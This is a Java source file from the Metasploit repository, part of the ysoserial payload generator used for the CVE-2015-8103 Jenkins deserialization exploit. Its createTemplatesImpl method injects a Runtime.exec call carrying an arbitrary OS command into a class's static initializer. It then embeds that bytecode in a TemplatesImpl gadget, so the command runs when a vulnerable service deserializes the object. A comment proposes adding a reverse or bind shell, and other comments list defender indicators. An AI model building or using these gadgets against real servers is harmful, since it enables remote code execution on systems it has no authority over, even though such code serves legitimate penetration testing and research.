GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/util/Gadgets.java
package ysoserial.payloads.util;
import java.io.Serializable;
import java.lang.reflect.Array;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
/*
 * Utility generator functions for common JDK-only gadgets.
 */
@SuppressWarnings("restriction")
public class Gadgets {
    // Fully-qualified name of the JDK-internal class that createMemoizedInvocationHandler
    // instantiates reflectively. Kept as a string (not a type reference) so this file compiles
    // without direct access to the sun.reflect package.
    private static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";

    /**
     * Minimal serializable translet whose two {@code transform} methods do nothing.
     * {@link #createTemplatesImpl(String)} loads this class through javassist, adds a static
     * initializer to it, renames it and ships the resulting bytecode inside a TemplatesImpl.
     */
    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
        private static final long serialVersionUID = -5971610431559700674L;

        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}

        @Override
        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
    }

    // required to make TemplatesImpl happy
    // Its class bytes are stored as the second element of the TemplatesImpl _bytecodes array
    // (see createTemplatesImpl); it carries no behaviour of its own.
    public static class Foo implements Serializable {
        private static final long serialVersionUID = 8207363842866235160L;
    }

    /**
     * Creates a dynamic proxy for {@code iface} (plus any extra {@code ifaces}) whose invocation
     * handler is the one built by {@link #createMemoizedInvocationHandler(Map)}.
     * The misspelling in the method name is part of the public API and is kept for callers.
     *
     * @param map    map handed to the invocation handler's constructor
     * @param iface  primary interface the proxy implements; also the type the result is cast to
     * @param ifaces additional interfaces, may be empty
     * @return the proxy, cast to {@code T}
     * @throws Exception propagated from the reflective construction of the handler
     */
    public static <T> T createMemoitizedProxy(final Map<String,Object> map, final Class<T> iface,
        final Class<?> ... ifaces) throws Exception {
        return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
    }

    /**
     * Reflectively instantiates {@value #ANN_INV_HANDLER_CLASS} through its first declared
     * constructor, passing {@code Override.class} and {@code map} as the two arguments.
     *
     * {@code Reflections.getFirstCtor} is a project helper not shown in this file; it is
     * presumably responsible for making the constructor accessible — confirm against the helper.
     *
     * @param map second constructor argument; stored by the handler
     * @return the handler, typed as the public {@link InvocationHandler} interface
     * @throws Exception on any reflective failure (class absent on this JDK, constructor
     *         inaccessible, wrong argument types, ...)
     */
    public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
        return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
    }

    /**
     * Wraps {@code ih} in a {@link Proxy} that implements {@code iface} followed by
     * {@code ifaces}, defined through {@code Gadgets}' own class loader.
     *
     * @param ih     handler that receives every method invocation on the proxy
     * @param iface  primary interface; placed first in the proxy's interface list and used for the cast
     * @param ifaces further interfaces, appended after {@code iface} in their given order
     * @return the proxy cast to {@code T}
     */
    public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?> ... ifaces) {
        // Slot 0 is iface; the varargs interfaces, if any, are copied in after it unchanged.
        final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
        allIfaces[0] = iface;
        if (ifaces.length > 0) {
            System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
        }
        return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces , ih));
    }

    /**
     * Builds a mutable single-entry map.
     *
     * @param key the only key
     * @param val the value stored under {@code key}
     * @return a new {@link HashMap} containing exactly that entry
     */
    public static Map<String,Object> createMap(final String key, final Object val) {
        final Map<String,Object> map = new HashMap<String, Object>();
        map.put(key,val);
        return map;
    }

    /**
     * Builds a {@link TemplatesImpl} whose embedded translet bytecode calls
     * {@code java.lang.Runtime.getRuntime().exec(command)} from its static initializer, so the
     * command runs whenever that class is initialised (TemplatesImpl does this when it instantiates
     * the translet — that code path is not shown here).
     *
     * Defender notes — every value below is fixed by this method, so they are stable indicators
     * of artefacts produced by it: the injected class is renamed to {@code ysoserial.Pwner} followed
     * by a {@code System.nanoTime()} value, the TemplatesImpl {@code _name} field is the literal
     * {@code "Pwnr"}, and the generated initializer contains a {@code Runtime.getRuntime().exec}
     * call. Whether these strings appear in a serialized stream depends on how the caller
     * serializes the returned object, which this file does not show.
     *
     * @param command OS command text spliced into the generated static-initializer source
     * @return the populated TemplatesImpl; its private fields are set reflectively via Reflections
     * @throws Exception from javassist (class lookup, compilation, bytecode emission) or from the
     *         reflective field writes
     */
    public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {
        final TemplatesImpl templates = new TemplatesImpl();

        // use template gadget class
        // The StubTransletPayload class path is added explicitly so javassist can find it
        // regardless of the default ClassPool search path.
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        // The replaceAll is intended to escape embedded double quotes before the command is
        // embedded in Java source text; no other characters are treated specially.
        clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");
        // sorta-random name to allow repeated exploitation (watch out for PermGen exhaustion)
        // The rename happens after the initializer is inserted and before toBytecode(), so the
        // emitted class file already carries the new name.
        clazz.setName("ysoserial.Pwner" + System.nanoTime());

        final byte[] classBytes = clazz.toBytecode();

        // inject class bytes into instance
        // Element 0 is the modified translet, element 1 the Foo marker class.
        // ClassFiles.classAsBytes is a project helper not shown in this file.
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes,
            ClassFiles.classAsBytes(Foo.class)});

        // required to make TemplatesImpl happy
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        return templates;
    }
}